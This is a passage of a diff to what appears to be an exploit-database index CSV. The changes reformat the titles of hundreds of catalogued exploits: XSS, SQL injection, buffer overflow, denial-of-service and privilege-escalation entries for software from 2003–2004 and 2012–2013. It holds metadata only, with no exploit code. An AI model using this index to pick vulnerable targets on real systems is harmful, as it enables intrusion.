Documentation 5.0 - Cross-Site Scripting Vulnerability",2003-09-15,"Ollie Whitehouse",windows,remote,0 23150,platforms/windows/dos/23150.c,"ChatZilla 0.8.23 - Remote Denial of Service Attack",2003-09-15,D4rkGr3y,windows,dos,0 23151,platforms/linux/remote/23151.c,"Liquid War 5.4.5/5.5.6 HOME Environment Variable Buffer Overflow Vulnerability",2003-09-16,"Angelo Rosiello",linux,remote,0 23152,platforms/windows/remote/23152.txt,"Yahoo! Webcam ActiveX Control 2.0.0.107 - Buffer Overrun Vulnerability",2003-09-16,cesaro,windows,remote,0 @@ -20416,7 +20416,7 @@ id,file,description,date,author,platform,type,port 23216,platforms/windows/dos/23216.txt,"Microsoft Word 97/98/2002 Malformed Document Denial of Service Vulnerability",2003-10-03,"Bahaa Naamneh",windows,dos,0 23217,platforms/cgi/webapps/23217.txt,"Divine Content Server 5.0 Error Page Cross-Site Scripting Vulnerability",2003-10-03,valgasu,cgi,webapps,0 23218,platforms/php/webapps/23218.txt,"EternalMart Mailing List Manager 1.32 - Remote File Include Vulnerabilities",2003-10-04,frog,php,webapps,0 -23219,platforms/php/webapps/23219.txt,"GuppY 2.4 Cross-Site Scripting Vulnerability",2003-10-05,frog,php,webapps,0 +23219,platforms/php/webapps/23219.txt,"GuppY 2.4 - Cross-Site Scripting Vulnerability",2003-10-05,frog,php,webapps,0 23220,platforms/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access Vulnerability",2003-10-05,frog,php,webapps,0 23221,platforms/multiple/remote/23221.txt,"JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection Vulnerability",2003-10-06,"Marc Schoenefeld",multiple,remote,0 23222,platforms/windows/remote/23222.txt,"File Sharing Software Easy File Sharing Web Server 1.2 Information Disclosure Vulnerability",2003-10-06,nimber@designer.ru,windows,remote,0 @@ -20441,7 +20441,7 @@ id,file,description,date,author,platform,type,port 23241,platforms/windows/dos/23241.pl,"mIRC 6.1 DCC SEND Buffer Overflow Vulnerability (2)",2003-10-13,DarkAngel,windows,dos,0 23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service Vulnerability",2003-10-14,storm@securiteam.com,windows,dos,0 23243,platforms/windows/remote/23243.py,"Free Float FTP Server USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 -23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 Cross-Site Scripting Vulnerability",2003-10-14,Ezhilan,php,webapps,0 +23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting Vulnerability",2003-10-14,Ezhilan,php,webapps,0 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability",2003-10-15,"Oliver Karow",linux,dos,0 23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 Integer Overflow",2012-12-09,beford,windows,dos,0 23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability",2003-10-25,Adik,windows,remote,0 @@ -20451,7 +20451,7 @@ id,file,description,date,author,platform,type,port 23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0 23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 - Multiple SQL Injection Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23253,platforms/php/webapps/23253.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 -23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 Denial of Service Vulnerability",2012-12-09,"High-Tech Bridge SA",windows,dos,0 +23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service Vulnerability",2012-12-09,"High-Tech Bridge SA",windows,dos,0 23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control User32.dll Function Buffer Overrun Vulnerability",2003-10-15,"Brett Moore",windows,local,0 23256,platforms/cfm/webapps/23256.txt,"Macromedia ColdFusion MX 6.0 SQL Error Message Cross-Site Scripting Vulnerability",2003-10-15,"Lorenzo Hernandez Garcia-Hierro",cfm,webapps,0 23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 Example Scripts And Servlets Cross-Site Scripting Vulnerability",2003-10-16,"Oliver Karow",multiple,remote,0 @@ -20462,7 +20462,7 @@ id,file,description,date,author,platform,type,port 23262,platforms/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",jsp,webapps,0 23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF Malformed Server Name Heap Corruption Vulnerability",2003-10-20,@stake,multiple,dos,0 23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injection Vulnerabilities",2003-10-20,"Aviram Jenik",php,webapps,0 -23265,platforms/windows/remote/23265.txt,"Sun Java Plug-In 1.4.2 _01 Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0 +23265,platforms/windows/remote/23265.txt,"Sun Java Plug-In 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0 23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart Server Error Message Installation Path Disclosure Vulnerability",2003-10-20,Dr`Ponidi,cgi,webapps,0 23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur Mailserver 3.3/4.0/4.2 IMAP AUTH Remote Buffer Overflow Vulnerability",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0 23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting Vulnerability",2003-10-21,ComSec,java,webapps,0 @@ -20487,7 +20487,7 @@ id,file,description,date,author,platform,type,port 23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 IFRAME Zone Restriction Bypass Vulnerability",2003-10-24,Mindwarper,multiple,remote,0 23292,platforms/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x Security Manager Denial of Service Vulnerability",2003-10-26,"Marc Schoenefeld",multiple,dos,0 23293,platforms/windows/dos/23293.txt,"Yahoo! Messenger 5.6 File Transfer Buffer Overrun Vulnerability",2003-10-27,"Hat-Squad Security Team",windows,dos,0 -23294,platforms/php/webapps/23294.txt,"Chi Kien Uong Guestbook 1.51 Cross-Site Scripting Vulnerability",2003-10-27,"Joshua P. Miller",php,webapps,0 +23294,platforms/php/webapps/23294.txt,"Chi Kien Uong Guestbook 1.51 - Cross-Site Scripting Vulnerability",2003-10-27,"Joshua P. Miller",php,webapps,0 23295,platforms/linux/remote/23295.txt,"SH-HTTPD 0.3/0.4 Character Filtering Remote Information Disclosure Vulnerability",2003-10-27,"dong-h0un U",linux,remote,0 23296,platforms/linux/remote/23296.txt,"Red Hat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote,0 23297,platforms/linux/local/23297.c,"Musicqueue 1.2 SIGSEGV Signal Handler Insecure File Creation Vulnerability",2003-10-27,"dong-h0un U",linux,local,0 @@ -20509,7 +20509,7 @@ id,file,description,date,author,platform,type,port 23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums Multiple Fileds HTML Injection Vulnerability",2003-10-30,ProXy,php,webapps,0 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service Vulnerability",2003-10-30,"Luigi Auriemma",multiple,dos,0 23315,platforms/jsp/webapps/23315.txt,"BEA WebLogic 6/7/8 InteractiveQuery.jsp Cross-Site Scripting Vulnerability",2003-10-31,"Corsaire Limited",jsp,webapps,0 -23316,platforms/windows/remote/23316.txt,"Citrix Metaframe XP Cross-Site Scripting Vulnerability",2003-10-31,"Andy Davis",windows,remote,0 +23316,platforms/windows/remote/23316.txt,"Citrix Metaframe XP - Cross-Site Scripting Vulnerability",2003-10-31,"Andy Davis",windows,remote,0 23317,platforms/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 Unauthorized Administrative Access Vulnerability",2003-10-31,slaizer,hardware,remote,0 23318,platforms/windows/remote/23318.txt,"Ashley Brown iWeb Server Encoded Backslash Directory Traversal Vulnerability",2003-10-31,cr-secure.net,windows,remote,0 23319,platforms/php/webapps/23319.txt,"Tritanium Scripts Tritanium Bulletin Board 1.2.3 Unauthorized Access Vulnerability",2003-10-31,"Virginity Security",php,webapps,0 @@ -20523,9 +20523,9 @@ id,file,description,date,author,platform,type,port 23327,platforms/windows/local/23327.txt,"DATEV Nutzungskontrolle 2.1/2.2 Unauthorized Access Vulnerability",2003-11-01,t4rku5,windows,local,0 23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption Vulnerability (1)",2003-11-03,airsupply,windows,remote,0 23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption Vulnerability (2)",2003-11-03,exworm,windows,remote,0 -23330,platforms/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 Cross-Site Scripting Vulnerability",2003-11-03,"Michael Frame",php,webapps,0 +23330,platforms/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 - Cross-Site Scripting Vulnerability",2003-11-03,"Michael Frame",php,webapps,0 23331,platforms/asp/webapps/23331.txt,"Web Wiz Forum 6.34/7.0/7.5 Unauthorized Private Forum Access Vulnerability",2003-11-03,"Alexander Antipov",asp,webapps,0 -23332,platforms/cgi/webapps/23332.txt,"MPM Guestbook 1.2 Cross-Site Scripting Vulnerability",2003-11-03,"David Ferreira",cgi,webapps,0 +23332,platforms/cgi/webapps/23332.txt,"MPM Guestbook 1.2 - Cross-Site Scripting Vulnerability",2003-11-03,"David Ferreira",cgi,webapps,0 23333,platforms/php/webapps/23333.txt,"PHPKit 1.6 Include.PHP Cross-Site Scripting Vulnerability",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps,0 23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 Long GET Request Buffer Overrun Vulnerability",2003-11-03,"Peter Winter-Smith",windows,remote,0 23335,platforms/asp/webapps/23335.txt,"VieNuke VieBoard 2.6 - SQL Injection Vulnerability",2003-11-03,ekerazha@yahoo.it,asp,webapps,0 @@ -20576,7 +20576,7 @@ id,file,description,date,author,platform,type,port 23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps,0 23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 $path Remote File Include Vulnerability",2003-11-17,"RusH security team",php,webapps,0 23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting Vulnerability",2003-11-17,"Ziv Kamir",multiple,remote,0 -23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 Cross-Site Scripting Vulnerability",2003-11-17,"David Sopas Ferreira",php,webapps,0 +23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting Vulnerability",2003-11-17,"David Sopas Ferreira",php,webapps,0 23387,platforms/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal Vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0 23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0 23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service Vulnerability",2003-11-19,anonymous,openbsd,dos,0 @@ -20584,7 +20584,7 @@ id,file,description,date,author,platform,type,port 23391,platforms/linux/dos/23391.txt,"FreeRADIUS 0.x/1.1.x Tag Field Heap Corruption Vulnerability",2003-11-20,"Evgeny Legerov",linux,dos,0 23392,platforms/openbsd/dos/23392.c,"OpenBSD 3.3/3.4 semctl/semop Local Unexpected Array Indexing Vulnerability",2003-11-21,anonymous,openbsd,dos,0 23393,platforms/linux/dos/23393.c,"GEdit 2.0/2.2 Large IOStream File Memory Corruption Vulnerability",2003-11-23,MegaHz,linux,dos,0 -23394,platforms/hardware/dos/23394.c,"Thomson Cablemodem TCM315 Denial of Service",2003-11-24,"Shell security group",hardware,dos,0 +23394,platforms/hardware/dos/23394.c,"Thomson Cablemodem TCM315 - Denial of Service",2003-11-24,"Shell security group",hardware,dos,0 23395,platforms/cgi/webapps/23395.txt,"CommerceSQL Shopping Cart 2.2 index.cgi Directory Traversal Vulnerability",2003-11-24,"Mariusz Ciesla",cgi,webapps,0 23396,platforms/multiple/remote/23396.txt,"SIRCD Server 0.5.2/0.5.3 Operator Privilege Escalation Vulnerability",2003-11-20,"Victor Jerlin",multiple,remote,0 23397,platforms/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 Overly Long HTTP Request Buffer Overrun Vulnerability",2003-11-24,Shadowinteger,linux,remote,0 @@ -20712,7 +20712,7 @@ id,file,description,date,author,platform,type,port 23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 PHPInfo Information Disclosure Weakness",2004-01-06,Windak,php,webapps,0 23527,platforms/hardware/remote/23527.txt,"ZyXEL ZyWALL 10 Management Interface Cross-Site Scripting Vulnerability",2004-01-06,"Rafel Ivgi",hardware,remote,0 23528,platforms/hardware/remote/23528.txt,"Edimax AR-6004 ADSL Router Management Interface Cross-Site Scripting Vulnerability",2004-01-06,"Rafel Ivgi",hardware,remote,0 -23529,platforms/windows/remote/23529.txt,"SnapStream PVS Lite 2.0 Cross-Site Scripting Vulnerability",2004-01-06,"Rafel Ivgi",windows,remote,0 +23529,platforms/windows/remote/23529.txt,"SnapStream PVS Lite 2.0 - Cross-Site Scripting Vulnerability",2004-01-06,"Rafel Ivgi",windows,remote,0 23530,platforms/windows/dos/23530.c,"Kroum Grigorov KpyM Telnet Server 1.0 - Remote Denial of Service Vulnerability",2004-01-07,NoRpiuS,windows,dos,0 23531,platforms/windows/remote/23531.c,"HD Soft Windows FTP Server 1.5/1.6 Username Format String Vulnerability",2004-01-12,mandragore,windows,remote,0 23532,platforms/windows/remote/23532.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal Vulnerability",2004-01-09,badpack3t,windows,remote,0 @@ -20746,8 +20746,8 @@ id,file,description,date,author,platform,type,port 23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23561,platforms/asp/webapps/23561.txt,"DUware Software Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0 23562,platforms/windows/remote/23562.html,"2Wire HomePortal Series - Directory Traversal Vulnerability",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 -23563,platforms/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 Cross-Site Scripting Vulnerability",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote,0 -23564,platforms/multiple/remote/23564.txt,"Mephistoles HTTPD 0.6 Cross-Site Scripting Vulnerability",2004-01-21,"Donato Ferrante",multiple,remote,0 +23563,platforms/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 - Cross-Site Scripting Vulnerability",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote,0 +23564,platforms/multiple/remote/23564.txt,"Mephistoles HTTPD 0.6 - Cross-Site Scripting Vulnerability",2004-01-21,"Donato Ferrante",multiple,remote,0 23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 (DownloadURLToFile()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 (Load()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 (CheckCompatibility()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 @@ -20768,17 +20768,17 @@ id,file,description,date,author,platform,type,port 23587,platforms/netware/remote/23587.txt,"Novell Netware Enterprise Web Server 5.1/6.0 snoop.jsp Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 23588,platforms/netware/remote/23588.txt,"Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 23589,platforms/netware/remote/23589.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - Multiple XSS Vulnerabilities",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 -23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 Denial of Service Vulnerability",2004-01-23,"Donato Ferrante",multiple,dos,0 +23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service Vulnerability",2004-01-23,"Donato Ferrante",multiple,dos,0 23591,platforms/windows/remote/23591.c,"RhinoSoft Serv-U FTP Server 3/4 MDTM Command Stack Overflow Vulnerability (1)",2004-01-24,mandragore,windows,remote,0 23592,platforms/windows/remote/23592.c,"RhinoSoft Serv-U FTP Server 3/4 MDTM Command Stack Overflow Vulnerability (2)",2004-01-25,mslug@safechina.net,windows,remote,0 23593,platforms/multiple/remote/23593.txt,"Oracle HTTP Server 8.1.7/9.0.1/9.2 isqlplus Cross-Site Scripting Vulnerability",2004-01-24,"Rafel Ivgi The-Insider",multiple,remote,0 23594,platforms/windows/remote/23594.txt,"tinyserver 1.1 - Directory Traversal",2004-01-24,"Donato Ferrante",windows,remote,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0 -23596,platforms/windows/remote/23596.txt,"TinyServer 1.1 Cross-Site scripting",2004-01-24,"Donato Ferrante",windows,remote,0 +23596,platforms/windows/remote/23596.txt,"TinyServer 1.1 - Cross-Site scripting",2004-01-24,"Donato Ferrante",windows,remote,0 23597,platforms/windows/remote/23597.txt,"borland Web server for corel paradox 1.0 b3 - Directory Traversal Vulnerability",2004-01-24,"Rafel Ivgi The-Insider",windows,remote,0 23598,platforms/multiple/remote/23598.txt,"IBM Net.Data 7.0/7.2 db2www Error Message Cross-Site Scripting Vulnerability",2004-01-26,"Carsten Eiram",multiple,remote,0 23599,platforms/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection Vulnerability",2004-01-26,"Bharat Mediratta",php,webapps,0 -23600,platforms/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 Cross-Site Scripting Vulnerability",2004-01-26,"Donato Ferrante",multiple,remote,0 +23600,platforms/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting Vulnerability",2004-01-26,"Donato Ferrante",multiple,remote,0 23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP Remote Command Execution",2012-12-23,metasploit,multiple,remote,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 DCC Get Dialog Denial of Service Vulnerability",2004-01-26,"MASTER VIPER",windows,dos,0 23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal Vulnerability",2004-01-26,"Donato Ferrante",windows,remote,0 @@ -20932,7 +20932,7 @@ id,file,description,date,author,platform,type,port 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 phptest.php Path Disclosure Vulnerability",2004-02-24,"Rafel Ivgi",php,webapps,0 23754,platforms/windows/remote/23754.rb,"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",2012-12-31,metasploit,windows,remote,0 23755,platforms/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine Remote Denial of Service Vulnerability",2004-02-24,"Luigi Auriemma",multiple,dos,0 -23756,platforms/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 Cross-Site Scripting Vulnerability",2004-02-24,"Rafel Ivgi The-Insider",multiple,remote,0 +23756,platforms/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 - Cross-Site Scripting Vulnerability",2004-02-24,"Rafel Ivgi The-Insider",multiple,remote,0 23757,platforms/linux/dos/23757.txt,"Gamespy Software Development Kit Remote Denial of Service Vulnerability",2004-02-24,"Luigi Auriemma",linux,dos,0 23758,platforms/windows/remote/23758.txt,"gweb http server 0.5/0.6 - Directory Traversal Vulnerability",2004-02-24,"Donato Ferrante",windows,remote,0 23759,platforms/linux/local/23759.pl,"MTools 3.9.x MFormat Privilege Escalation Vulnerability",2004-02-25,"Sebastian Krahmer",linux,local,0 @@ -20942,14 +20942,14 @@ id,file,description,date,author,platform,type,port 23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (4)",2004-02-26,lion,windows,remote,0 23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 Error Page Cross-Site Scripting Vulnerability",2004-02-26,Soby,hardware,remote,0 23765,platforms/solaris/local/23765.c,"Sun Solaris 8/9 Unspecified Passwd Local Root Compromise Vulnerability",2004-02-27,"Marco Ivaldi",solaris,local,0 -23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 Cross-Domain Event Leakage Vulnerability",2004-02-27,iDefense,windows,remote,0 +23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage Vulnerability",2004-02-27,iDefense,windows,remote,0 23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability",2003-09-11,Jelmer,windows,remote,0 23769,platforms/windows/dos/23769.pl,"argosoft ftp server 1.0/1.2/1.4 - Multiple Vulnerabilities",2004-02-27,"Beyond Security",windows,dos,0 23770,platforms/php/webapps/23770.txt,"IGeneric Free Shopping Cart 1.4 - SQL Injection Vulnerability",2004-03-01,"David Sopas Ferreira",php,webapps,0 23771,platforms/linux/remote/23771.pl,"GNU Anubis 3.6.x/3.9.x - Multiple Format String",2004-03-01,"Ulf Harnhammar",linux,remote,0 23772,platforms/linux/remote/23772.c,"GNU Anubis 3.6.x/3.9.x auth.c auth_ident() Function Overflow",2004-03-01,CMN,linux,remote,0 -23773,platforms/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 Cross-Site Scripting Vulnerability",2004-03-01,"David Sopas Ferreira",php,webapps,0 +23773,platforms/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 - Cross-Site Scripting Vulnerability",2004-03-01,"David Sopas Ferreira",php,webapps,0 23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple Parameter SQL Injection",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23776,platforms/windows/remote/23776.txt,"Software602 602Pro LAN Suite Web Mail Cross-Site Scripting Vulnerability",2004-03-01,"Rafel Ivgi The-Insider",windows,remote,0 @@ -20976,7 +20976,7 @@ id,file,description,date,author,platform,type,port 23798,platforms/php/webapps/23798.txt,"Confixx 2 Perl Debugger Remote Command Execution Vulnerability",2004-03-09,wkr,php,webapps,0 23799,platforms/multiple/dos/23799.txt,"Epic Games Unreal Tournament Server 436.0 Engine Remote Format String Vulnerability",2004-03-10,"Luigi Auriemma",multiple,dos,0 23800,platforms/osx/remote/23800.txt,"Apple Safari 1.x Cookie Path Traversal Information Disclosure",2004-03-10,"Corsaire Limited",osx,remote,0 -23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 Cross-Site Scripting Vulnerability",2004-03-11,"Donato Ferrante",linux,remote,0 +23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting Vulnerability",2004-03-11,"Donato Ferrante",linux,remote,0 23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0 23803,platforms/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 Error Page XSS",2004-03-11,"Donato Ferrante",linux,remote,0 23804,platforms/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 Resetpass Remote Command Execution Vulnerability",2004-03-11,"Arab VieruZ",cgi,remote,0 @@ -21069,7 +21069,7 @@ id,file,description,date,author,platform,type,port 23896,platforms/linux/dos/23896.txt,"MPlayer 0.9/1.0 - Remote HTTP Header Buffer Overflow Vulnerability",2004-03-30,blexim,linux,dos,0 23897,platforms/cgi/webapps/23897.txt,"LinBit Technologies LINBOX Officeserver Remote Authentication Bypass Vulnerability",2004-03-30,"Martin Eiszner",cgi,webapps,0 23898,platforms/asp/webapps/23898.txt,"Cactusoft CactuShop 5.0/5.1 - SQL Injection Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0 -23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 Cross-Site Scripting Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0 +23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 - Cross-Site Scripting Vulnerability",2004-03-31,"Nick Gudov",asp,webapps,0 23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 Console CD Player PrintTOC Function Buffer Overflow Vulnerability",2004-03-31,"Shaun Colley",hardware,dos,0 23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 23902,platforms/multiple/dos/23902.txt,"Roger Wilco Server 1.4.1 UDP Datagram Handling Denial of Service Vulnerability",2004-03-31,"Luigi Auriemma",multiple,dos,0 @@ -21165,7 +21165,7 @@ id,file,description,date,author,platform,type,port 23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0 23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0 24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0 -24001,platforms/cgi/webapps/24001.txt,"Rhino Software Zaep AntiSpam 2.0 Cross-Site Scripting Vulnerability",2004-04-14,"Noam Rathaus",cgi,webapps,0 +24001,platforms/cgi/webapps/24001.txt,"Rhino Software Zaep AntiSpam 2.0 - Cross-Site Scripting Vulnerability",2004-04-14,"Noam Rathaus",cgi,webapps,0 24002,platforms/windows/dos/24002.py,"Microsoft Outlook Express 6.0 - Remote Denial of Service Vulnerability",2004-04-14,"Ben Rampling",windows,dos,0 24003,platforms/php/webapps/24003.txt,"phpBugTracker 0.9 query.php Multiple Parameter SQL Injection",2004-04-15,JeiAr,php,webapps,0 24004,platforms/php/webapps/24004.txt,"phpBugTracker 0.9 bug.php Multiple Parameter SQL Injection",2004-04-15,JeiAr,php,webapps,0 @@ -21210,7 +21210,7 @@ id,file,description,date,author,platform,type,port 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x/2.6.x CPUFreq Proc Handler Integer Handling Vulnerability",2004-04-23,"Brad Spengler",linux,local,0 24044,platforms/php/webapps/24044.txt,"phpliteadmin <= 1.9.3 - Remote PHP Code Injection Vulnerability",2013-01-11,L@usch,php,webapps,0 24045,platforms/java/remote/24045.rb,"Java Applet JMX Remote Code Execution",2013-01-11,metasploit,java,remote,0 -24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 Cross-Site Scripting Vulnerability",2004-04-23,DarkBicho,php,webapps,0 +24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting Vulnerability",2004-04-23,DarkBicho,php,webapps,0 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 index.php SQL Injection",2004-04-23,waraxe,php,webapps,0 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 blocker_query.php Multiple Parameter XSS",2004-04-23,waraxe,php,webapps,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 Ver.asp Information Disclosure Vulnerability",2004-04-23,CyberTalon,asp,webapps,0 @@ -21304,7 +21304,7 @@ id,file,description,date,author,platform,type,port 24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 Content Filter Bypass Vulnerability",2004-05-24,"Marc Ruef",hardware,remote,0 24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Local Privilege Escalation Vulnerability",2004-05-24,"Rob Brown",linux,local,0 24142,platforms/windows/dos/24142.pl,"MollenSoft Lightweight FTP Server 3.6 - Remote Denial of Service Vulnerability",2004-05-24,storm,windows,dos,0 -24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 Denial of Service Vulnerability",2004-05-24,Alexander,hardware,dos,0 +24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 - Denial of Service Vulnerability",2004-05-24,Alexander,hardware,dos,0 24144,platforms/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service Vulnerability",2004-05-26,"Donato Ferrante",windows,dos,0 24145,platforms/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 HTTP 